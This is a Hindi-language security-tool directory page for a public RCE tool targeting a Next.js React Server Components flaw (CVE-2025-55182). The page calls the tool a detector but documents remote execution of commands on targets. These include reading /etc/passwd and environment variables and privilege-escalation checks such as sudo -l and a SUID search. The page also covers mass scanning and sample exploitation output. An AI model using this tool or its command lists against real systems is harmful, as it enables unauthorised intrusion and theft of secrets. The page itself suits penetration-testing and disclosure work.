Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Components. | Kitploit
उपकरण/GitHubGitHub/rix4uni/cve-2025-55182
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and Control
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Components.

रिपॉजिटरी देखें
613 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182

React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में CVE-2025-55182 और CVE-2025-66478 का पता लगाने के लिए एक कमांड-लाइन टूल।

🚀 स्थापना

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ उपयोग

CVE-2025-55182 स्कैनर

मूल वाक्यविन्यास

root@kitploit:~
CVE-2025-55182 -d https://example.com

विकल्प

नोट: यदि कोई कमांड विकल्प प्रदान नहीं किया गया है, तो डिफ़ॉल्ट कमांड निष्पादित होते हैं।

डिफ़ॉल्ट कमांड

टूल डिफ़ॉल्ट रूप से ये कमांड निष्पादित करता है:

  1. cat /etc/os-release - OS जानकारी
  2. whoami - वर्तमान उपयोगकर्ता
  3. pwd - वर्तमान कार्यशील निर्देशिका
  4. id - उपयोगकर्ता ID और समूह
  5. uname -a - सिस्टम जानकारी
  6. hostname -I - नेटवर्क इंटरफ़ेस
  7. ls -la - निर्देशिका सूची
  8. cat /etc/passwd - उपयोगकर्ता खाते
  9. env - पर्यावरण चर
  10. ps aux - चल रही प्रक्रियाएँ

रिपोर्ट जनरेटर

reportgenerator टूल स्कैन परिणामों से स्वचालित रूप से पेशेवर भेद्यता प्रकटीकरण रिपोर्ट तैयार करता है।

विशेषताएँ

  • एकाधिक लक्ष्यों का समानांतर स्कैनिंग
  • स्वचालित संख्यांकन जो मौजूदा रिपोर्टों को संरक्षित करता है (कोई ओवरराइट नहीं)
  • पेशेवर मार्कडाउन रिपोर्ट जिसमें सुरक्षा भेद्यता प्रकटीकरण अनुभाग शामिल है
  • अनुकूलन योग्य शोधकर्ता नाम और इनपुट फ़ाइल

मूल उपयोग

root@kitploit:~
# लक्ष्य डोमेन के साथ एक फ़ाइल बनाएँ
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# रिपोर्ट जनरेटर चलाएँ
reportgenerator

विकल्प

फ़्लैगविवरणडिफ़ॉल्ट
--fileलक्ष्य डोमेन वाली इनपुट फ़ाइलsubs.txt
--userप्रकटीकरण अनुभाग के लिए शोधकर्ता का नामBhagirath Saxena

उदाहरण

root@kitploit:~
# डिफ़ॉल्ट सेटिंग्स का उपयोग करें (subs.txt, Bhagirath Saxena)
reportgenerator

# कस्टम लक्ष्य फ़ाइल का उपयोग करें
reportgenerator --file targets.txt

# कस्टम शोधकर्ता नाम का उपयोग करें
reportgenerator --user "John Doe"

# दोनों कस्टम विकल्पों का उपयोग करें
reportgenerator --file my-targets.txt --user "Jane Smith"

आउटपुट संरचना

रिपोर्ट दो निर्देशिकाओं में उत्पन्न होती हैं:

  • textfile/ - कच्चा स्कैन आउटपुट (संख्या: 1.txt, 2.txt, आदि)
  • mdfile/ - पेशेवर मार्कडाउन रिपोर्ट (संख्या: 1.md, 2.md, आदि)

नोट: स्वचालित संख्यांकन सुविधा यह सुनिश्चित करती है कि मौजूदा रिपोर्ट कभी ओवरराइट न हों। नए स्कैन सबसे बड़ी मौजूदा संख्या से जारी रहते हैं।

रिपोर्ट प्रारूप

प्रत्येक उत्पन्न रिपोर्ट में शामिल है:

  1. सुरक्षा भेद्यता प्रकटीकरण - पेशेवर परिचय पत्र
  2. लक्ष्य - परीक्षण किया गया डोमेन
  3. निष्पादित कमांड - परीक्षण के दौरान चलाए गए कमांड की सूची
  4. भेद्यता सारांश - CVE विवरण और प्रभाव मूल्यांकन
  5. शोषण विवरण - निष्पादन स्थिति के साथ कमांड आउटपुट
  6. निष्पादन सारांश - प्रत्येक कमांड की सफलता/विफलता दर्शाने वाली तालिका
  7. प्रभाव विश्लेषण - गंभीरता मूल्यांकन और अवलोकन
  8. सिफारिशें - सुरक्षा टीम के लिए उपचारात्मक कदम
  9. संदर्भ - CVE विवरण और सुरक्षा सलाहकारों के लिंक

🎨 आउटपुट उदाहरण

सफल शोषण

root@kitploit:~
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...

[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...

आंशिक सफलता

root@kitploit:~
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝

[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 तकनीकी विवरण

भेद्यता

  • CVE: CVE-2025-55182
  • प्रकार: प्रोटोटाइप प्रदूषण → RCE
  • प्रभावित: विशिष्ट कॉन्फ़िगरेशन वाले Next.js अनुप्रयोग
  • वेक्टर: क्राफ्टेड multipart/form-data के साथ HTTP POST
  • प्रभाव: अनुप्रयोग उपयोगकर्ता के रूप में अनप्रमाणित दूरस्थ कोड निष्पादन

📚 संदर्भ

  • CVE-2025-55182 विवरण
  • Next.js सुरक्षा सलाहकार

commands/ निर्देशिका उदाहरण:

विभिन्न परिदृश्यों के लिए नमूना कमांड फ़ाइलें बनाएँ:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
टूल डाउनलोड करें
विकल्पविवरणडिफ़ॉल्ट
-d, --domainलक्ष्य URL (यदि कोई प्रोटोकॉल नहीं है तो स्वचालित रूप से https:// जोड़ता है)http://localhost:3000
-c, --commandनिष्पादित करने के लिए एकल कमांड-
-m, --multipleअर्धविराम द्वारा अलग किए गए एकाधिक कमांड-
-f, --fileकमांड वाली फ़ाइल (प्रति पंक्ति एक)-
-h, --helpसहायता संदेश दिखाएं-